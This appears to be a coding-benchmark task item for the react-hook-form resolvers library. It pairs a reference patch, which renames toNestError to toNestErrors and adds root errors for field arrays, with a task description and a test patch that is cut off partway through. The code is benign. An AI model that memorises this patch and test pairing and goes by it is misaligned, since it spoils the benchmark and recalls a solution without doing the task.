options), }; } diff --git a/io-ts/src/io-ts.ts b/io-ts/src/io-ts.ts index 8abb0d9..c03c1e0 100644 --- a/io-ts/src/io-ts.ts +++ b/io-ts/src/io-ts.ts @@ -1,6 +1,6 @@ import * as Either from 'fp-ts/Either'; import { pipe } from 'fp-ts/function'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import errorsToRecord from './errorsToRecord'; import { Resolver } from './types'; @@ -13,7 +13,7 @@ export const ioTsResolver: Resolver = (codec) => (values, _context, options) => !options.shouldUseNativeValidation && options.criteriaMode === 'all', ), ), - Either.mapLeft((errors) => 
toNestError(errors, options)), + Either.mapLeft((errors) => toNestErrors(errors, options)), Either.fold( (errors) => ({ values: {}, diff --git a/joi/src/joi.ts b/joi/src/joi.ts index 29f6938..5b4baf4 100644 --- a/joi/src/joi.ts +++ b/joi/src/joi.ts @@ -1,5 +1,5 @@ import { appendErrors, FieldError } from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import type { ValidationError } from 'joi'; import { Resolver } from './types'; @@ -61,7 +61,7 @@ export const joiResolver: Resolver = if (result.error) { return { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrorSchema( result.error, !options.shouldUseNativeValidation && diff --git a/nope/src/nope.ts b/nope/src/nope.ts index c212e6c..dc9b5bc 100644 --- a/nope/src/nope.ts +++ b/nope/src/nope.ts @@ -1,5 +1,5 @@ -import type {FieldError, FieldErrors} from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import type { FieldError, FieldErrors } from 'react-hook-form'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import type { ShapeErrors } from 'nope-validator/lib/cjs/types'; import type { Resolver } from './types'; @@ -37,7 +37,7 @@ export const nopeResolver: Resolver = | undefined; if (result) { - return { values: {}, errors: toNestError(parseErrors(result), options) }; + return { values: {}, errors: toNestErrors(parseErrors(result), options) }; } options.shouldUseNativeValidation && validateFieldsNatively({}, options); diff --git a/package.json b/package.json index 1d89e3c..0f97fa7 100644 --- a/package.json +++ b/package.json @@ -209,10 +209,10 @@ "devDependencies": { "@sinclair/typebox": "^0.31.1", "@testing-library/dom": "^9.3.1", - "@testing-library/jest-dom": "^6.0.0", + "@testing-library/jest-dom": "^6.0.1", "@testing-library/react": "^14.0.0", "@testing-library/user-event": "^14.4.3", - 
"@types/node": "^20.5.0", + "@types/node": "^20.5.1", "@types/react": "^18.2.20", "@typescript-eslint/eslint-plugin": "^6.4.0", "@typescript-eslint/parser": "^6.4.0", @@ -251,9 +251,9 @@ "vest": "^4.6.11", "vite": "^4.4.9", "vite-tsconfig-paths": "^4.2.0", - "vitest": "^0.34.1", + "vitest": "^0.34.2", "yup": "^1.2.0", - "zod": "^3.22.1" + "zod": "^3.22.2" }, "peerDependencies": { "react-hook-form": "^7.0.0" diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml index 1a23c38..1dedec4 100644 --- a/pnpm-lock.yaml +++ b/pnpm-lock.yaml @@ -12,8 +12,8 @@ devDependencies: specifier: ^9.3.1 version: 9.3.1 '@testing-library/jest-dom': - specifier: ^6.0.0 - version: 6.0.0(vitest@0.34.1) + specifier: ^6.0.1 + version: 6.0.1(vitest@0.34.2) '@testing-library/react': specifier: ^14.0.0 version: 14.0.0(react-dom@18.2.0)(react@18.2.0) @@ -21,8 +21,8 @@ devDependencies: specifier: ^14.4.3 version: 14.4.3(@testing-library/dom@9.3.1) '@types/node': - specifier: ^20.5.0 - version: 20.5.0 + specifier: ^20.5.1 + version: 20.5.1 '@types/react': specifier: ^18.2.20 version: 18.2.20 @@ -133,19 +133,19 @@ devDependencies: version: 4.6.11 vite: specifier: ^4.4.9 - version: 4.4.9(@types/node@20.5.0) + version: 4.4.9(@types/node@20.5.1) vite-tsconfig-paths: specifier: ^4.2.0 version: 4.2.0(typescript@5.1.6)(vite@4.4.9) vitest: - specifier: ^0.34.1 - version: 0.34.1(jsdom@22.1.0) + specifier: ^0.34.2 + version: 0.34.2(jsdom@22.1.0) yup: specifier: ^1.2.0 version: 1.2.0 zod: - specifier: ^3.22.1 - version: 3.22.1 + specifier: ^3.22.2 + version: 3.22.2 packages: @@ -1915,8 +1915,8 @@ packages: pretty-format: 27.5.1 dev: true - /@testing-library/jest-dom@6.0.0(vitest@0.34.1): - resolution: {integrity: sha512-Ye2R3+/oM27jir8CzYPmuWdavTaKwNZcu0d22L9pO/vnOYE0wmrtpw79TQJa8H6gV8/i7yd+pLaqeLlA0rTMfg==} + /@testing-library/jest-dom@6.0.1(vitest@0.34.2): + resolution: {integrity: sha512-0hx/AWrJp8EKr8LmC5jrV3Lx8TZySH7McU1Ix2czBPQnLd458CefSEGjZy7w8kaBRA6LhoPkGjoZ3yqSs338IQ==} engines: {node: '>=14', npm: '>=6', 
yarn: '>=1'} peerDependencies: '@jest/globals': '>= 28' @@ -1941,7 +1941,7 @@ packages: dom-accessibility-api: 0.5.16 lodash: 4.17.21 redent: 3.0.0 - vitest: 0.34.1(jsdom@22.1.0) + vitest: 0.34.2(jsdom@22.1.0) dev: true /@testing-library/react@14.0.0(react-dom@18.2.0)(react@18.2.0): @@ -2003,8 +2003,8 @@ packages: resolution: {integrity: sha512-Hr5Jfhc9eYOQNPYO5WLDq/n4jqijdHNlDXjuAQkkt+mWdQR+XJToOHrsD4cPaMXpn6KO7y2+wM8AZEs8VpBLVA==} dev: true - /@types/node@20.5.0: - resolution: {integrity: sha512-Mgq7eCtoTjT89FqNoTzzXg2XvCi5VMhRV6+I2aYanc6kQCBImeNaAYRs/DyoVqk1YEUJK5gN9VO7HRIdz4Wo3Q==} + /@types/node@20.5.1: + resolution: {integrity: sha512-4tT2UrL5LBqDwoed9wZ6N3umC4Yhz3W3FloMmiiG4JwmUJWpie0c7lcnUNd4gtMKuDEO4wRVS8B6Xa0uMRsMKg==} dev: true /@types/parse-json@4.0.0: @@ -2032,7 +2032,7 @@ packages: /@types/resolve@1.17.1: resolution: {integrity: sha512-yy7HuzQhj0dhGpD8RLXSZWEkLsV9ibvxvi6EiJ3bkqLAO1RGo0WbkWQiwpRlSFymTJRz0d3k5LM3kkx8ArDbLw==} dependencies: - '@types/node': 20.5.0 + '@types/node': 20.5.1 dev: true /@types/scheduler@0.16.3: @@ -2188,43 +2188,43 @@ packages: '@babel/plugin-transform-react-jsx-self': 7.22.5(@babel/core@7.22.10) '@babel/plugin-transform-react-jsx-source': 7.22.5(@babel/core@7.22.10) react-refresh: 0.14.0 - vite: 4.4.9(@types/node@20.5.0) + vite: 4.4.9(@types/node@20.5.1) transitivePeerDependencies: - supports-color dev: true - /@vitest/expect@0.34.1: - resolution: {integrity: sha512-q2CD8+XIsQ+tHwypnoCk8Mnv5e6afLFvinVGCq3/BOT4kQdVQmY6rRfyKkwcg635lbliLPqbunXZr+L1ssUWiQ==} + /@vitest/expect@0.34.2: + resolution: {integrity: sha512-EZm2dMNlLyIfDMha17QHSQcg2KjeAZaXd65fpPzXY5bvnfx10Lcaz3N55uEe8PhF+w4pw+hmrlHLLlRn9vkBJg==} dependencies: - '@vitest/spy': 0.34.1 - '@vitest/utils': 0.34.1 + '@vitest/spy': 0.34.2 + '@vitest/utils': 0.34.2 chai: 4.3.7 dev: true - /@vitest/runner@0.34.1: - resolution: {integrity: sha512-YfQMpYzDsYB7yqgmlxZ06NI4LurHWfrH7Wy3Pvf/z/vwUSgq1zLAb1lWcItCzQG+NVox+VvzlKQrYEXb47645g==} + /@vitest/runner@0.34.2: + resolution: 
{integrity: sha512-8ydGPACVX5tK3Dl0SUwxfdg02h+togDNeQX3iXVFYgzF5odxvaou7HnquALFZkyVuYskoaHUOqOyOLpOEj5XTA==} dependencies: - '@vitest/utils': 0.34.1 + '@vitest/utils': 0.34.2 p-limit: 4.0.0 pathe: 1.1.1 dev: true - /@vitest/snapshot@0.34.1: - resolution: {integrity: sha512-0O9LfLU0114OqdF8lENlrLsnn024Tb1CsS9UwG0YMWY2oGTQfPtkW+B/7ieyv0X9R2Oijhi3caB1xgGgEgclSQ==} + /@vitest/snapshot@0.34.2: + resolution: {integrity: sha512-qhQ+xy3u4mwwLxltS4Pd4SR+XHv4EajiTPNY3jkIBLUApE6/ce72neJPSUQZ7bL3EBuKI+NhvzhGj3n5baRQUQ==} dependencies: magic-string: 0.30.2 pathe: 1.1.1 pretty-format: 29.6.2 dev: true - /@vitest/spy@0.34.1: - resolution: {integrity: sha512-UT4WcI3EAPUNO8n6y9QoEqynGGEPmmRxC+cLzneFFXpmacivjHZsNbiKD88KUScv5DCHVDgdBsLD7O7s1enFcQ==} + /@vitest/spy@0.34.2: + resolution: {integrity: sha512-yd4L9OhfH6l0Av7iK3sPb3MykhtcRN5c5K5vm1nTbuN7gYn+yvUVVsyvzpHrjqS7EWqn9WsPJb7+0c3iuY60tA==} dependencies: tinyspy: 2.1.1 dev: true - /@vitest/utils@0.34.1: - resolution: {integrity: sha512-/ql9dsFi4iuEbiNcjNHQWXBum7aL8pyhxvfnD9gNtbjR9fUKAjxhj4AA3yfLXg6gJpMGGecvtF8Au2G9y3q47Q==} + /@vitest/utils@0.34.2: + resolution: {integrity: sha512-Lzw+kAsTPubhoQDp1uVAOP6DhNia1GMDsI9jgB0yMn+/nDaPieYQ88lKqz/gGjSHL4zwOItvpehec9OY+rS73w==} dependencies: diff-sequences: 29.4.3 loupe: 2.3.6 @@ -4062,7 +4062,7 @@ packages: resolution: {integrity: sha512-KWYVV1c4i+jbMpaBC+U++4Va0cp8OisU185o73T1vo99hqi7w8tSJfUXYswwqqrjzwxa6KpRK54WhPvwf5w6PQ==} engines: {node: '>= 10.13.0'} dependencies: - '@types/node': 20.5.0 + '@types/node': 20.5.1 merge-stream: 2.0.0 supports-color: 7.2.0 dev: true @@ -5784,8 +5784,8 @@ packages: resolution: {integrity: sha512-1XMJE5fQo1jGH6Y/7ebnwPOBEkIEnT4QF32d5R1+VXdXveM0IBMJt8zfaxX1P3QhVwrYe+576+jkANtSS2mBbw==} dev: true - /std-env@3.3.3: - resolution: {integrity: sha512-Rz6yejtVyWnVjC1RFvNmYL10kgjC49EOghxWn0RFqlCHGFpQx+Xe7yW3I4ceK1SGrWIGMjD5Kbue8W/udkbMJg==} + /std-env@3.4.0: + resolution: {integrity: 
sha512-YqHeQIIQ8r1VtUZOTOyjsAXAsjr369SplZ5rlQaiJTBsvodvPSCME7vuz8pnQltbQ0Cw0lyFo5Q8uyNwYQ58Xw==} dev: true /stop-iteration-iterator@1.0.0: @@ -6269,8 +6269,8 @@ packages: vest-utils: 0.1.1 dev: true - /vite-node@0.34.1(@types/node@20.5.0): - resolution: {integrity: sha512-odAZAL9xFMuAg8aWd7nSPT+hU8u2r9gU3LRm9QKjxBEF2rRdWpMuqkrkjvyVQEdNFiBctqr2Gg4uJYizm5Le6w==} + /vite-node@0.34.2(@types/node@20.5.1): + resolution: {integrity: sha512-JtW249Zm3FB+F7pQfH56uWSdlltCo1IOkZW5oHBzeQo0iX4jtC7o1t9aILMGd9kVekXBP2lfJBEQt9rBh07ebA==} engines: {node: '>=v14.18.0'} hasBin: true dependencies: @@ -6279,7 +6279,7 @@ packages: mlly: 1.4.0 pathe: 1.1.1 picocolors: 1.0.0 - vite: 4.4.9(@types/node@20.5.0) + vite: 4.4.9(@types/node@20.5.1) transitivePeerDependencies: - '@types/node' - less @@ -6302,13 +6302,13 @@ packages: debug: 4.3.4 globrex: 0.1.2 tsconfck: 2.1.2(typescript@5.1.6) - vite: 4.4.9(@types/node@20.5.0) + vite: 4.4.9(@types/node@20.5.1) transitivePeerDependencies: - supports-color - typescript dev: true - /vite@4.4.9(@types/node@20.5.0): + /vite@4.4.9(@types/node@20.5.1): resolution: {integrity: sha512-2mbUn2LlUmNASWwSCNSJ/EG2HuSRTnVNaydp6vMCm5VIqJsjMfbIWtbH2kDuwUVW5mMUKKZvGPX/rqeqVvv1XA==} engines: {node: ^14.18.0 || >=16.0.0} hasBin: true @@ -6336,7 +6336,7 @@ packages: terser: optional: true dependencies: - '@types/node': 20.5.0 + '@types/node': 20.5.1 esbuild: 0.18.20 postcss: 8.4.28 rollup: 3.28.0 @@ -6344,8 +6344,8 @@ packages: fsevents: 2.3.2 dev: true - /vitest@0.34.1(jsdom@22.1.0): - resolution: {integrity: sha512-G1PzuBEq9A75XSU88yO5G4vPT20UovbC/2osB2KEuV/FisSIIsw7m5y2xMdB7RsAGHAfg2lPmp2qKr3KWliVlQ==} + /vitest@0.34.2(jsdom@22.1.0): + resolution: {integrity: sha512-WgaIvBbjsSYMq/oiMlXUI7KflELmzM43BEvkdC/8b5CAod4ryAiY2z8uR6Crbi5Pjnu5oOmhKa9sy7uk6paBxQ==} engines: {node: '>=v14.18.0'} hasBin: true peerDependencies: @@ -6377,12 +6377,12 @@ packages: dependencies: '@types/chai': 4.3.5 '@types/chai-subset': 1.3.3 - '@types/node': 20.5.0 - '@vitest/expect': 0.34.1 - 
'@vitest/runner': 0.34.1 - '@vitest/snapshot': 0.34.1 - '@vitest/spy': 0.34.1 - '@vitest/utils': 0.34.1 + '@types/node': 20.5.1 + '@vitest/expect': 0.34.2 + '@vitest/runner': 0.34.2 + '@vitest/snapshot': 0.34.2 + '@vitest/spy': 0.34.2 + '@vitest/utils': 0.34.2 acorn: 8.10.0 acorn-walk: 8.2.0 cac: 6.7.14 @@ -6393,12 +6393,12 @@ packages: magic-string: 0.30.2 pathe: 1.1.1 picocolors: 1.0.0 - std-env: 3.3.3 + std-env: 3.4.0 strip-literal: 1.3.0 tinybench: 2.5.0 tinypool: 0.7.0 - vite: 4.4.9(@types/node@20.5.0) - vite-node: 0.34.1(@types/node@20.5.0) + vite: 4.4.9(@types/node@20.5.1) + vite-node: 0.34.2(@types/node@20.5.1) why-is-node-running: 2.2.2 transitivePeerDependencies: - less @@ -6600,6 +6600,6 @@ packages: type-fest: 2.19.0 dev: true - /zod@3.22.1: - resolution: {integrity: sha512-+qUhAMl414+Elh+fRNtpU+byrwjDFOS1N7NioLY+tSlcADTx4TkCUua/hxJvxwDXcV4397/nZ420jy4n4+3WUg==} + /zod@3.22.2: + resolution: {integrity: sha512-wvWkphh5WQsJbVk1tbx1l1Ly4yg+XecD+Mq280uBGt9wa5BKSWf4Mhp6GmrkPixhMxmabYY7RbzlwVP32pbGCg==} dev: true diff --git a/src/index.ts b/src/index.ts index d110470..cd22ab1 100644 --- a/src/index.ts +++ b/src/index.ts @@ -1,2 +1,2 @@ -export * from './toNestError'; +export * from './toNestErrors'; export * from './validateFieldsNatively'; diff --git a/src/toNestError.ts b/src/toNestError.ts deleted file mode 100644 index 2161769..0000000 --- a/src/toNestError.ts +++ /dev/null @@ -1,29 +0,0 @@ -import { - set, - get, - FieldErrors, - Field, - ResolverOptions, - FieldValues, -} from 'react-hook-form'; -import { validateFieldsNatively } from './validateFieldsNatively'; - -export const toNestError = <TFieldValues extends FieldValues>( - errors: FieldErrors, - options: ResolverOptions<TFieldValues>, -): FieldErrors<TFieldValues> => { - options.shouldUseNativeValidation && validateFieldsNatively(errors, options); - - const fieldErrors = {} as FieldErrors<TFieldValues>; - for (const path in errors) { - const field = get(options.fields, path) as Field['_f'] | 
undefined; - - set( - fieldErrors, - path, - Object.assign(errors[path] || {}, { ref: field && field.ref }), - ); - } - - return fieldErrors; -}; diff --git a/src/toNestErrors.ts b/src/toNestErrors.ts new file mode 100644 index 0000000..5c4b839 --- /dev/null +++ b/src/toNestErrors.ts @@ -0,0 +1,47 @@ +import { + set, + get, + FieldErrors, + Field, + ResolverOptions, + FieldValues, + InternalFieldName, +} from 'react-hook-form'; +import { validateFieldsNatively } from './validateFieldsNatively'; + +export const toNestErrors = <TFieldValues extends FieldValues>( + errors: FieldErrors, + options: ResolverOptions<TFieldValues>, +): FieldErrors<TFieldValues> => { + options.shouldUseNativeValidation && validateFieldsNatively(errors, options); + + const fieldErrors = {} as FieldErrors<TFieldValues>; + for (const path in errors) { + const field = get(options.fields, path) as Field['_f'] | undefined; + const error = Object.assign(errors[path] || {}, { + ref: field && field.ref, + }); + + if (isNameInFieldArray(options.names || Object.keys(errors), path)) { + const fieldArrayErrors = Object.assign( + {}, + compact(get(fieldErrors, path)), + ); + + set(fieldArrayErrors, 'root', error); + set(fieldErrors, path, fieldArrayErrors); + } else { + set(fieldErrors, path, error); + } + } + + return fieldErrors; +}; + +const compact = <TValue>(value: TValue[]) => + Array.isArray(value) ? 
value.filter(Boolean) : []; + +const isNameInFieldArray = ( + names: InternalFieldName[], + name: InternalFieldName, +) => names.some((n) => n.startsWith(name + '.')); diff --git a/superstruct/src/superstruct.ts b/superstruct/src/superstruct.ts index a563d22..9704891 100644 --- a/superstruct/src/superstruct.ts +++ b/superstruct/src/superstruct.ts @@ -1,5 +1,5 @@ import { FieldError } from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import { StructError, validate } from 'superstruct'; import { Resolver } from './types'; @@ -22,7 +22,7 @@ export const superstructResolver: Resolver = if (result[0]) { return { values: {}, - errors: toNestError(parseErrorSchema(result[0]), options), + errors: toNestErrors(parseErrorSchema(result[0]), options), }; } diff --git a/typanion/src/typanion.ts b/typanion/src/typanion.ts index c52e6b6..7d716d9 100644 --- a/typanion/src/typanion.ts +++ b/typanion/src/typanion.ts @@ -1,5 +1,5 @@ import type { FieldError, FieldErrors } from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import type { Resolver } from './types'; const parseErrors = (errors: string[], parsedErrors: FieldErrors = {}) => { @@ -37,5 +37,5 @@ export const typanionResolver: Resolver = return { values, errors: {} }; } - return { values: {}, errors: toNestError(parsedErrors, options) }; + return { values: {}, errors: toNestErrors(parsedErrors, options) }; }; diff --git a/typebox/src/typebox.ts b/typebox/src/typebox.ts index 3424ab3..3fe79ae 100644 --- a/typebox/src/typebox.ts +++ b/typebox/src/typebox.ts @@ -1,5 +1,5 @@ import { appendErrors, FieldError, FieldErrors } from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from 
'@hookform/resolvers'; import type { Resolver } from './types'; import { Value, ValueError } from '@sinclair/typebox/value'; @@ -53,7 +53,7 @@ export const typeboxResolver: Resolver = return { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrorSchema( errors, !options.shouldUseNativeValidation && options.criteriaMode === 'all', diff --git a/valibot/src/valibot.ts b/valibot/src/valibot.ts index ec269b1..d57af56 100644 --- a/valibot/src/valibot.ts +++ b/valibot/src/valibot.ts @@ -1,4 +1,4 @@ -import { toNestError } from '@hookform/resolvers'; +import { toNestErrors } from '@hookform/resolvers'; import type { Resolver } from './types'; import { BaseSchema, @@ -13,7 +13,7 @@ const parseErrors = ( validateAllFieldCriteria: boolean, ): FieldErrors => { const errors: Record<string, FieldError> = {}; - for (; valiErrors.issues.length;) { + for (; valiErrors.issues.length; ) { const error = valiErrors.issues[0]; if (!error.path) { continue; @@ -47,45 +47,45 @@ const parseErrors = ( export const valibotResolver: Resolver = (schema, schemaOptions, resolverOptions = {}) => - async (values, _, options) => { - try { - const schemaOpts = Object.assign( - {}, - { - abortEarly: false, - abortPipeEarly: false, - }, - schemaOptions, - ); + async (values, _, options) => { + try { + const schemaOpts = Object.assign( + {}, + { + abortEarly: false, + abortPipeEarly: false, + }, + schemaOptions, + ); - const parsed = - resolverOptions.mode === 'sync' - ? parse(schema as BaseSchema, values, schemaOpts) - : await parseAsync( + const parsed = + resolverOptions.mode === 'sync' + ? parse(schema as BaseSchema, values, schemaOpts) + : await parseAsync( schema as BaseSchema | BaseSchemaAsync, values, schemaOpts, ); + return { + values: resolverOptions.raw ? values : parsed, + errors: {} as FieldErrors, + }; + } catch (error) { + if (error instanceof ValiError) { return { - values: resolverOptions.raw ? 
values : parsed, - errors: {} as FieldErrors, - }; - } catch (error) { - if (error instanceof ValiError) { - return { - values: {}, - errors: toNestError( - parseErrors( - error, - !options.shouldUseNativeValidation && + values: {}, + errors: toNestErrors( + parseErrors( + error, + !options.shouldUseNativeValidation && options.criteriaMode === 'all', - ), - options, ), - }; - } - - throw error; + options, + ), + }; } - }; + + throw error; + } + }; diff --git a/vest/src/vest.ts b/vest/src/vest.ts index 5348c1a..ea750cc 100644 --- a/vest/src/vest.ts +++ b/vest/src/vest.ts @@ -1,4 +1,4 @@ -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import { FieldError } from 'react-hook-form'; import promisify from 'vest/promisify'; import type { VestErrors, Resolver } from './types'; @@ -34,7 +34,7 @@ export const vestResolver: Resolver = if (result.hasErrors()) { return { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrorSchema( result.getErrors(), !options.shouldUseNativeValidation && diff --git a/yup/src/yup.ts b/yup/src/yup.ts index 6536e00..85ff2ba 100644 --- a/yup/src/yup.ts +++ b/yup/src/yup.ts @@ -1,5 +1,5 @@ import * as Yup from 'yup'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import { appendErrors, FieldError, @@ -86,11 +86,11 @@ export function yupResolver<TFieldValues extends FieldValues>( return { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrorSchema( e, !options.shouldUseNativeValidation && - options.criteriaMode === 'all', + options.criteriaMode === 'all', ), options, ), diff --git a/zod/src/zod.ts b/zod/src/zod.ts index 53c95bd..8a5e241 100644 --- a/zod/src/zod.ts +++ b/zod/src/zod.ts @@ -1,6 +1,6 @@ import { appendErrors, FieldError, FieldErrors } from 'react-hook-form'; import { z, ZodError } from 'zod'; 
-import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import type { Resolver } from './types'; const isZodError = (error: any): error is ZodError => error.errors != null; @@ -73,7 +73,7 @@ export const zodResolver: Resolver = if (isZodError(error)) { return { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrorSchema( error.errors, !options.shouldUseNativeValidation &&
feat: add support for root errors for field array
**Title** Add support for root‑level errors on field arrays **Problem** When a validation schema reports an error that applies to an entire field array, the error is not represented in the result returned by the resolvers. Consequently, form components cannot react to array‑wide validation failures. **Root Cause** The previous error‑nesting helper only attached errors to individual field paths and never generated a `root` entry for a field array, so array‑level errors were dropped. **Fix / Expected Behavior** - Introduce a new nesting utility that detects when an error’s path belongs to a field array and adds a `root` key containing the array‑wide error. - Replace all resolver imports to use the new utility, ensuring every resolver now returns correctly nested errors. - Export the new utility from the package entry point. - Preserve existing error shaping (field `ref`, criteria mode handling) while adding the `root` support. - Maintain native validation integration and existing resolver signatures. **Risk & Validation** - Verify that existing unit tests continue to pass, confirming no regression for non‑array fields. - Add tests (or run existing ones) that simulate field‑array validation failures and assert the presence of the `root` error. - Run the TypeScript build to ensure the new export and type signatures compile across all resolver packages.
621
react-hook-form/resolvers
diff --git a/.prettierrc.js b/prettier.config.cjs similarity index 100% rename from .prettierrc.js rename to prettier.config.cjs diff --git a/src/__tests__/__snapshots__/toNestObject.ts.snap b/src/__tests__/__snapshots__/toNestError.ts.snap similarity index 100% rename from src/__tests__/__snapshots__/toNestObject.ts.snap rename to src/__tests__/__snapshots__/toNestError.ts.snap diff --git a/src/__tests__/__snapshots__/toNestErrors.ts.snap b/src/__tests__/__snapshots__/toNestErrors.ts.snap new file mode 100644 index 0000000..d58e052 --- /dev/null +++ b/src/__tests__/__snapshots__/toNestErrors.ts.snap @@ -0,0 +1,67 @@ +// Vitest Snapshot v1, https://vitest.dev/guide/snapshot.html + +exports[`transforms flat object to nested object 1`] = ` +{ + "name": { + "message": "first message", + "ref": { + "reportValidity": [MockFunction spy], + "setCustomValidity": [MockFunction spy], + }, + "type": "st", + }, + "test": [ + { + "name": { + "message": "second message", + "ref": undefined, + "type": "nd", + }, + }, + ], +} +`; + +exports[`transforms flat object to nested object and shouldUseNativeValidation: true 1`] = ` +{ + "name": { + "message": "first message", + "ref": { + "reportValidity": [MockFunction spy] { + "calls": [ + [], + ], + "results": [ + { + "type": "return", + "value": undefined, + }, + ], + }, + "setCustomValidity": [MockFunction spy] { + "calls": [ + [ + "first message", + ], + ], + "results": [ + { + "type": "return", + "value": undefined, + }, + ], + }, + }, + "type": "st", + }, + "test": [ + { + "name": { + "message": "second message", + "ref": undefined, + "type": "nd", + }, + }, + ], +} +`; diff --git a/src/__tests__/toNestErrors.ts b/src/__tests__/toNestErrors.ts new file mode 100644 index 0000000..6ac0df6 --- /dev/null +++ b/src/__tests__/toNestErrors.ts @@ -0,0 +1,206 @@ +import { Field, FieldError, InternalFieldName } from 'react-hook-form'; +import { toNestErrors } from '../toNestErrors'; + +const flatObject: Record<string, FieldError> = { + 
name: { type: 'st', message: 'first message' }, + 'test.0.name': { type: 'nd', message: 'second message' }, +}; + +const fields = { + name: { + ref: { + reportValidity: vi.fn(), + setCustomValidity: vi.fn(), + }, + }, + unused: { + ref: { name: 'unusedRef' }, + }, +} as any as Record<InternalFieldName, Field['_f']>; + +test('transforms flat object to nested object', () => { + expect( + toNestErrors(flatObject, { fields, shouldUseNativeValidation: false }), + ).toMatchSnapshot(); +}); + +test('transforms flat object to nested object and shouldUseNativeValidation: true', () => { + expect( + toNestErrors(flatObject, { fields, shouldUseNativeValidation: true }), + ).toMatchSnapshot(); + expect( + (fields.name.ref as HTMLInputElement).reportValidity, + ).toHaveBeenCalledTimes(1); + expect( + (fields.name.ref as HTMLInputElement).setCustomValidity, + ).toHaveBeenCalledTimes(1); + expect( + (fields.name.ref as HTMLInputElement).setCustomValidity, + ).toHaveBeenCalledWith(flatObject.name.message); +}); + +test('transforms flat object to nested object with root error for field array', () => { + const result = toNestErrors( + { + username: { type: 'username', message: 'username is required' }, + 'fieldArrayWithRootError.0.name': { + type: 'first', + message: 'first message', + }, + 'fieldArrayWithRootError.0.nestFieldArrayWithoutRootError.0.title': { + type: 'title', + message: 'title', + }, + 'fieldArrayWithRootError.0.nestFieldArrayWithRootError': { + type: 'nested-root-title', + message: 'nested root errors', + }, + 'fieldArrayWithRootError.0.nestFieldArrayWithRootError.0.title': { + type: 'nestFieldArrayWithRootError-title', + message: 'nestFieldArrayWithRootError-title', + }, + 'fieldArrayWithRootError.1.name': { + type: 'second', + message: 'second message', + }, + fieldArrayWithRootError: { type: 'root-error', message: 'root message' }, + 'fieldArrayWithoutRootError.0.name': { + type: 'first', + message: 'first message', + }, + 'fieldArrayWithoutRootError.1.name': { + 
type: 'second', + message: 'second message', + }, + }, + { + fields: { + username: { name: 'username', ref: { name: 'username' } }, + fieldArrayWithRootError: { + name: 'fieldArrayWithRootError', + ref: { name: 'fieldArrayWithRootError' }, + }, + 'fieldArrayWithRootError.0.name': { + name: 'fieldArrayWithRootError.0.name', + ref: { name: 'fieldArrayWithRootError.0.name' }, + }, + 'fieldArrayWithRootError.0.nestFieldArrayWithoutRootError.0.title': { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithoutRootError.0.title', + ref: { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithoutRootError.0.title', + }, + }, + 'fieldArrayWithRootError.0.nestFieldArrayWithRootError': { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithRootError', + ref: { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithRootError', + }, + }, + 'fieldArrayWithRootError.0.nestFieldArrayWithRootError.0.title': { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithRootError.0.title', + ref: { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithRootError.0.title', + }, + }, + 'fieldArrayWithRootError.1.name': { + name: 'fieldArrayWithRootError.1.name', + ref: { name: 'fieldArrayWithRootError.1.name' }, + }, + 'fieldArrayWithoutRootError.0.name': { + name: 'fieldArrayWithoutRootError.0.name', + ref: { name: 'fieldArrayWithoutRootError.0.name' }, + }, + 'fieldArrayWithoutRootError.1.name': { + name: 'fieldArrayWithoutRootError.1.name', + ref: { name: 'fieldArrayWithoutRootError.1.name' }, + }, + }, + names: [ + 'username', + 'fieldArrayWithRootError', + 'fieldArrayWithRootError.0.name', + 'fieldArrayWithRootError.0.nestFieldArrayWithoutRootError.0.title', + 'fieldArrayWithRootError.1.name', + 'fieldArrayWithoutRootError.0.name', + 'fieldArrayWithoutRootError.1.name', + 'fieldArrayWithRootError.0.nestFieldArrayWithRootError', + 'fieldArrayWithRootError.0.nestFieldArrayWithRootError.0.title', + ], + shouldUseNativeValidation: false, + }, + ); + + expect(result).toEqual({ + username: { + 
type: 'username', + message: 'username is required', + ref: { name: 'username' }, + }, + fieldArrayWithRootError: { + '0': { + name: { + type: 'first', + message: 'first message', + ref: { name: 'fieldArrayWithRootError.0.name' }, + }, + nestFieldArrayWithoutRootError: [ + { + title: { + type: 'title', + message: 'title', + ref: { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithoutRootError.0.title', + }, + }, + }, + ], + nestFieldArrayWithRootError: { + '0': { + title: { + type: 'nestFieldArrayWithRootError-title', + message: 'nestFieldArrayWithRootError-title', + ref: { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithRootError.0.title', + }, + }, + }, + root: { + type: 'nested-root-title', + message: 'nested root errors', + ref: { + name: 'fieldArrayWithRootError.0.nestFieldArrayWithRootError', + }, + }, + }, + }, + '1': { + name: { + type: 'second', + message: 'second message', + ref: { name: 'fieldArrayWithRootError.1.name' }, + }, + }, + root: { + type: 'root-error', + message: 'root message', + ref: { 